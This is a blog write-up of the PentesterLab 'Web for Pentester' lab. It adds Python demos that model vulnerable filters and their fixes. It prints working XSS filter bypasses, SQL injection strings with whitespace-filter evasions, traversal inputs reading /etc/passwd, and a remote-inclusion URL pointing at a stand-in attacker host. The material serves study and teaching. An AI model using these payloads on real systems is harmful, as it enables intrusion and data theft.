Tue. Oct 20th, 2020

Pentesting Fun Stuff

following the cyber security path…

Web for pentester I

Introduction

This is an exercise from PentesterLab that covers some of the basic web vulnerabilities.

Location

https://www.pentesterlab.com/exercises/web_for_pentester

Getting started

To get a view of what is running, I start with an nmap scan.

Three ports seem to be open: 22 (SSH), 80 (HTTP) and 389 (LDAP).
On the website are the following sections listed:

  1. XSS
  2. SQL injections
  3. Directory traversal
  4. File inclusion
  5. Code injection
  6. Command injection
  7. LDAP attack
  8. File upload
  9. XML attack

I’m going to start from the top and work my way down.

1. XSS

When I follow the first link in the “XSS” section I find a parameter holding the value ‘hacker’.
[screenshot: xss1]

To test for a possible XSS vulnerability I replace the value with a piece of JavaScript code.
The value doesn’t get validated and is echoed straight back onto the page.
[screenshot: xss3]
Viewing the page source confirms that the request is echoed back without any encoding.

When I follow example 2 and inject the same JavaScript code, I get a different result.
[screenshot: xss2-1]
Viewing the source shows that ‘<script>’ and ‘</script>’ are stripped. Once I vary the format of the tag a little, the script does get echoed back intact.

The third example filters differently. This time the solution lies in the following payload.

The fourth example filters the whole ‘<script>’ tag and renders it useless, but by using a different HTML tag I can still get a pop-up.
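To make the difference between examples 2, 3 and 4 concrete, here is an added example (my own code, not the exercise’s PHP) that models each filter as I understand it from the observations above and reflects the result into a page the way the vulnerable code does. The filter bodies are assumptions: a case-sensitive strip of the literal tags, a case-insensitive single-pass strip, and an outright rejection of anything containing “script”. The bypasses show why each model falls, and html.escape shows what the fix looks like.

```python
import html
import re

# Constructed payload; "n13mant" is the handle used throughout this write-up.
PAYLOAD = '<script>alert("n13mant")</script>'


def no_filter(value: str) -> str:
    """Example 1: the parameter is echoed back untouched."""
    return value


def filter_example2(value: str) -> str:
    """Assumed model of the example-2 filter: strip the literal lowercase tags."""
    return value.replace("<script>", "").replace("</script>", "")


def filter_example3(value: str) -> str:
    """Assumed model of the example-3 filter: case-insensitive, but still one pass."""
    return re.sub(r"</?script>", "", value, flags=re.IGNORECASE)


def filter_example4(value: str):
    """Assumed model of the example-4 filter: refuse anything containing 'script'."""
    if re.search(r"script", value, re.IGNORECASE):
        return None
    return value


def escape(value: str) -> str:
    """The fix: HTML-encode before echoing, so the value stays data."""
    return html.escape(value, quote=True)


def reflect(filter_fn, value: str):
    """The vulnerable pattern: the (filtered) parameter is written raw into the page.
    Returns None when the filter rejected the request outright."""
    out = filter_fn(value)
    return None if out is None else f"<p>Hello {out}</p>"


# A <script> tag, or an inline event handler inside some tag.
_SCRIPT_OR_HANDLER = re.compile(r"<script\b|<\w+[^>]*\bon\w+\s*=", re.IGNORECASE)


def would_execute(page) -> bool:
    """Rough static check: does a script tag or an event handler survive in the markup?"""
    return page is not None and _SCRIPT_OR_HANDLER.search(page) is not None


# Bypasses, one per filter model.
BYPASS_CASE = '<SCRIPT>alert("n13mant")</SCRIPT>'                     # beats the case-sensitive strip
BYPASS_NESTED = '<scr<script>ipt>alert("n13mant")</scr</script>ipt>'  # one-pass removal re-forms the tag
BYPASS_TAG = '<img src=x onerror=alert("n13mant")>'                   # contains no "script" at all

if __name__ == "__main__":
    cases = [
        ("example 1, no filter", no_filter, PAYLOAD),
        ("example 2, original payload", filter_example2, PAYLOAD),
        ("example 2, case bypass", filter_example2, BYPASS_CASE),
        ("example 3, case bypass fails", filter_example3, BYPASS_CASE),
        ("example 3, nested bypass", filter_example3, BYPASS_NESTED),
        ("example 4, nested bypass rejected", filter_example4, BYPASS_NESTED),
        ("example 4, other tag", filter_example4, BYPASS_TAG),
        ("fixed with html.escape", escape, BYPASS_TAG),
    ]
    for label, flt, payload in cases:
        page = reflect(flt, payload)
        print(f"{label:34} executes={would_execute(page)!s:5} page={page!r}")
```

The nested payload is the interesting one: the filter removes the inner `<script>` once and the surrounding characters close up into a fresh `<script>`, which is why a blacklist has to be applied repeatedly (or, better, replaced by output encoding) rather than run a single time.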

For the rest of the examples I’m only going to write up the correct payload.
Example 5:

Example 6:

Example 7:

Example 8:

Example 9:
At the time of writing this example doesn’t run in modern browsers. I could download an old browser version and run it, but I’ll skip that. The example is executed simply by replacing #hacker in the URL with #<script>alert("n13mant")</script>.
 

2. SQL injections

Example 1:
[screenshot: sql1]
Let’s add a single quote.
[screenshot: sql2]
Now let’s add a double quote.
[screenshot: sql3]
So the single quote breaks the query. Let’s build on that.
[screenshot: sql4]
Example 2:
[screenshot: sql2-1]
No spaces allowed… no problem!
[screenshot: sql2-2]
Example 3:
The same solution works for this example, but its intended purpose is bypassing the filter with /**/.
[screenshot: sql3-1]
Example 4:
[screenshot: sql4-1]
Example 5:
[screenshot: sql5-1]
Example 6:
[screenshot: sql6-1]
Example 7:
Before URL encoding:
[screenshot: sql7-1]

After URL encoding:
[screenshot: sql7-2]
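The screenshots above hide the actual mechanics, so here is an added example (my own code, not PentesterLab’s application or database) that reproduces the same steps against a constructed SQLite table: the single quote breaks the query while the double quote doesn’t, the `or 1=1` payload returns every row, a no-space filter is beaten first with a tab and then with `/**/` when all whitespace is rejected, and the payload is URL-encoded the way it has to appear in the query string. The two filter modes are assumptions about what the exercise checks; the `/**/` comment trick behaves the same way in MySQL.

```python
import sqlite3
from urllib.parse import quote


def make_db() -> sqlite3.Connection:
    """Constructed sample table (not the PentesterLab database)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, age INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", 30), (2, "hacker", 25), (3, "user1", 40)])
    return conn


def vulnerable_lookup(conn, name: str, filt=None):
    """Models the vulnerable pattern: user input concatenated into the query.
    filt selects an assumed server-side filter:
      "spaces"     - reject a literal space character
      "whitespace" - reject any whitespace, so a tab no longer helps
    """
    if filt == "spaces" and " " in name:
        raise ValueError("ERROR NO SPACE")
    if filt == "whitespace" and any(c.isspace() for c in name):
        raise ValueError("ERROR NO SPACE")
    sql = f"SELECT id, name, age FROM users WHERE name='{name}'"
    return conn.execute(sql).fetchall()


def probe(conn, name: str, filt=None) -> str:
    """Summarise what the application would show for a given input."""
    try:
        rows = vulnerable_lookup(conn, name, filt)
    except sqlite3.OperationalError:
        return "sql error"          # the query no longer parses (unterminated string)
    except ValueError as exc:
        return str(exc)             # the filter rejected the request
    return f"{len(rows)} rows"


def safe_lookup(conn, name: str):
    """The fix: a bound parameter, so a quote in the input is data, never syntax."""
    return conn.execute("SELECT id, name, age FROM users WHERE name=?", (name,)).fetchall()


def encode_payload(payload: str) -> str:
    """What the payload must look like in the query string (example 7): every
    reserved character percent-encoded, including the quote, space and '='."""
    return quote(payload, safe="")


if __name__ == "__main__":
    conn = make_db()
    for label, name, filt in [
        ("plain value", "hacker", None),
        ("single quote", "hacker'", None),
        ("double quote", 'hacker"', None),
        ("or 1=1", "hacker' or 1=1 -- ", None),
        ("or 1=1, space filter", "hacker' or 1=1 -- ", "spaces"),
        ("tabs, space filter", "hacker'\tor\t1=1\t--\t", "spaces"),
        ("tabs, whitespace filter", "hacker'\tor\t1=1\t--\t", "whitespace"),
        ("/**/, whitespace filter", "hacker'/**/or/**/1=1/**/--/**/", "whitespace"),
    ]:
        print(f"{label:26} -> {probe(conn, name, filt)}")
    print("parameterised:", safe_lookup(conn, "hacker' or 1=1 -- "))
    print("url-encoded  :", encode_payload("hacker' or 1=1 -- "))
```

The double-quote probe is the useful negative result: it returns no rows but no error either, because inside a single-quoted SQL string a double quote is just a character. Only the quote that matches the one the application used breaks the statement.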
Example 8:

 

3. Directory traversal

Example 1:
[screenshot: pt1-1]
Example 2:
[screenshot: pt2-1]
Example 3:
[screenshot: pt3-1]
 

4. File inclusion

Example 1:
[screenshot: fi1-1]
So far I have a Local File Inclusion. Now to turn it into a Remote File Inclusion: for this I’ve created a PHP file containing phpinfo() to include remotely.
[screenshot: fi1-2]
Example 2:
[screenshot: fi2-2]
[screenshot: fi2-1]
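Directory traversal (section 3) and local file inclusion (this section) both come down to the application concatenating a user-supplied file name onto a fixed directory. As an added example that is not the exercise’s PHP, the following Python builds a small constructed directory tree, shows the plain-concatenation read escaping the images directory with `../../etc/passwd`, and then the hardened read that rejects URL schemes (the remote-inclusion case; this stands in for what PHP’s allow_url_include=Off does) and resolves the path before checking it is still inside the intended directory. The directory layout, file contents and host name are all made up for the demonstration.

```python
import os
import tempfile
from urllib.parse import urlsplit


def setup_demo_tree() -> str:
    """Constructed layout (not the PentesterLab VM):
       <root>/www/images/hacker.png  - the file the page is meant to serve
       <root>/etc/passwd             - stands in for a file outside the web root
    """
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "www", "images"))
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(root, "www", "images", "hacker.png"), "w") as fh:
        fh.write("PNG (constructed placeholder)")
    with open(os.path.join(root, "etc", "passwd"), "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
    return root


def images_dir(root: str) -> str:
    """The fixed prefix the application prepends, trailing slash included."""
    return os.path.join(root, "www", "images") + "/"


def vulnerable_read(images: str, user_file: str) -> str:
    """Models  readfile("images/" . $_GET['file'])  : plain string concatenation,
    so '../' segments walk straight out of the images directory."""
    with open(images + user_file) as fh:
        return fh.read()


def safe_read(images: str, user_file: str) -> str:
    """Hardened version. Two checks:
    1. no URL scheme at all, which closes the remote-inclusion door;
    2. the fully resolved target must still sit under the images directory,
       which closes traversal whether it uses '../', an absolute path or a symlink.
    """
    if urlsplit(user_file).scheme:
        raise PermissionError("remote includes are not allowed")
    base = os.path.realpath(images)
    target = os.path.realpath(os.path.join(base, user_file))
    if target == base or os.path.commonpath([base, target]) != base:
        raise PermissionError(f"{user_file!r} escapes {base}")
    with open(target) as fh:
        return fh.read()


def attempt(reader, images: str, user_file: str) -> str:
    """Run a reader and report 'denied' instead of raising, for easy comparison."""
    try:
        return reader(images, user_file)
    except PermissionError:
        return "denied"


if __name__ == "__main__":
    img = images_dir(setup_demo_tree())
    for user_file in ["hacker.png", "../../etc/passwd", "/etc/passwd",
                      "http://attacker.example/phpinfo.php"]:
        print(f"{user_file:38} vulnerable={attempt(vulnerable_read, img, user_file)[:20]!r:24}"
              f" safe={attempt(safe_read, img, user_file)[:20]!r}")
```

Note that the check is done on the realpath of both sides: comparing the raw strings would let `images/../../etc/passwd` through because it does start with the images prefix, which is exactly the bug the concatenation version has.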

5. Code injection

Example 1:
[screenshot: code_inj1-1]
Example 2:
[screenshot: code_inj2-1]
Example 3:
The regex pattern got modified from n13mant to n13mant/e; the /e modifier causes the replacement value ‘hacker’ to be evaluated as PHP code.
[screenshot: code_inj3-1]
Example 4:
[screenshot: code_inj4-1]

6. Command injection

To be continued….

7. LDAP attack

To be continued….

8. File upload

To be continued….

9. XML attack

To be continued….
 
